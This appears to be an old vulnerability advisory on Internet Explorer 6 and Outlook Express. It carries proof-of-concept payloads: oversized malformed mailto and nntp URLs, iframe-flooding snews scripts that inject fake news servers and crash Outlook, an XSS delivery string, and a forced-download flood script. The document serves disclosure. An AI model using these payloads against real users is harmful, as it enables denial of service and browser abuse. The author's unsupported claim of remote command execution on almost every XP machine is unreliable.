Internet Explorer - Multiple Vulnerabilities

Discovered by Rafel Ivgi, The-Insider.
http://theinsider.deep-ice.com

Every time i Read about a Vulnerability concerning I.E i believe more
and more and I.E is the biggest backdoor ever.
After the CONTENT-TYPE: bug that allowed to download exe's as audio's
and all the patches, I.E 6 still has parsing problems. I discovered
that amazingly with another wonderful microsoft software, i can
force downloads on users, fake downloaded file extentions and names,
inject scripts to the "blank" file, run a lot of different applications,
cause a lot of errors and see the content of binary files inside I.E,
cause a buffer overflow in outlook and even D.O.S the system.
Before you read the following text i believe the most dangerous bug in I.E
is the possibility
of actively creating <iframes> or poping up new windows *without a
limit*(only memory limit). This makes it easy
to create many errors, overflows , and to D.O.S internet users.

****************************************************************************
*********************************
Internet Explorer & Outlook Express (6.00.2600 - Fully Patched)

Microsoft has inserted a filtering engine inside Internet Explorer. This
engine verifies that
only secure,valid and appropriate(in syntax) data will be passed on to
external applications.
**************************************************
The filtering engine skips a few important checks such as the "MAILTO:"
protocol. With no filtering
it allows inappropriate data to be sent to the default mail client.

Example:
mailto:%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaa
aa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%
a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5
%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99
%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%9
8aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%9
9%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%
98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00
%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaa
aaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%0
0%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%
C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%
99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01
%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2
%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e
2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%
00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98

which pops up the following error message : "The default mail client is not
properly installed".
There should be filtering because there can't be such email address such as
this:(which is accepted by the I.E plugins filter)

mailto:%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%
01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%
98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5
%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaa
aa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%
e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C
8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e
2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%
a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaa
aaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a
6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5
%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3
%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
a%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaa%
a5%e2%99%a6%e2%99%a3aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaa
**************************************************

This filtering engine also filters outlook links such as the NNTP & SNTP
protocols. However
the security hole appears when an attacker uses the SNEWS protocol, which
has no filterings.

nntp://aaaaaa.com/aaaaa - filtering active! - results an error message.
sntp://aaaaaaaaaaaaaaa - filtering active! - results an error message.
snews://aaaaaaaaaaaaa - filtering *inactive!* - results activation of
outlook and server injection into outlook.

This secuirty hole allows any html page/website to open outlook express and
inject anything
as if it was a valid news server. This can be a troubling issue if someone
will make a loop
that will inject a huge amount of fake snews servers, this address will
remain written in the outlook's
news servers database and may cause crash or waste of system resources.
The simplest way to exploit this vulnerability is by XSS(Cross Site
Scripting)

Local example - example.html :
-------------- Cut Here --------------
<script>
var i
for (i=1;i<1000000;i++) {
document.write("\<iframe
src=\"snews://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" + i +
"\"\>\<\/iframe>");
}
document.refresh;
</script>
-------------- Cut Here --------------

Or by XSS:

http://<XSS_VULN_HOST>/<script>var i; for (i=1;i<1000000;i++) {
document.write("\<iframe
src=\"snews://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" + i +
"\"\>\<\/iframe>"); } document.refresh; </script>

This issue also creates a Buffer Overflow within Outlook Express at offset
0x00dc735, which closes
outlook express, slows down the system and may even halt low memory
machines.
This buffer overflow in outlook express is HIGHLY DANGEROUS , it can cause
remote arbitary command executions on almost every XP machine on earth.

Temporary Fix For This Problem: The first time outlook is ran by the url
"snews://aaaaaaaaaaaa"
it asks the user if he would like outlook to be the default "SNEWS" client,
Choosing no will
solve the problem for now.
****************************************************************************
*********************************
Disable Backspace In I.E

*Manually Type* in I.E address bar "http://www.yourhost.com/#"
CLICK ENTER..
No backspace!

No special danger except abusing simple people.
****************************************************************************
*********************************

I.E automatically starts download box a file when the same file with a
".css" extention exists in that folder.
For example:
http://<host>/styles

This will cause an I.E download box that tries to download the file
"styles".
***This happends only because a file named "styles.css" is located in that
folder.***

Exploit Example - example2.html :
-------------- Cut Here --------------:
<script>
var i
for (i=1;i<1000;i++) {
document.write("\<iframe src=\"http://<host>/styles\"\>\<\/iframe>");
}
document.refresh;
</script>
-------------- Cut Here --------------:

This will execute frontpage and will start reffering the ".css" to it. For
each file download there
will open 2 message boxes, 1 is the download windows and 2 is the error
"cant find " message,
which reveals/enumerates the path of all local Temporary Internet Files
folders. This quick memory
overload will fill-up frontpage memory and afterwards it will open the
".css" files in "notepad". And
after its done with notepad memeory it will try opening files in "open
with", which is done by "rundll32.exe".
At this point "rundll32.exe" will reach a out of memory overflow and will
raise a message box for each
file download attempt.
****************************************************************************
*********************************
I.E Long Parameter Errors
nntp:///62.219.131.195/a=?b=?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaafile://http://ftp://www.tripod.com
can be tested with all protocols nntp://,sntp://,ldap://,ftp://
****************************************************************************
*********************************

"Things that are unlikeable, are NOT impossible."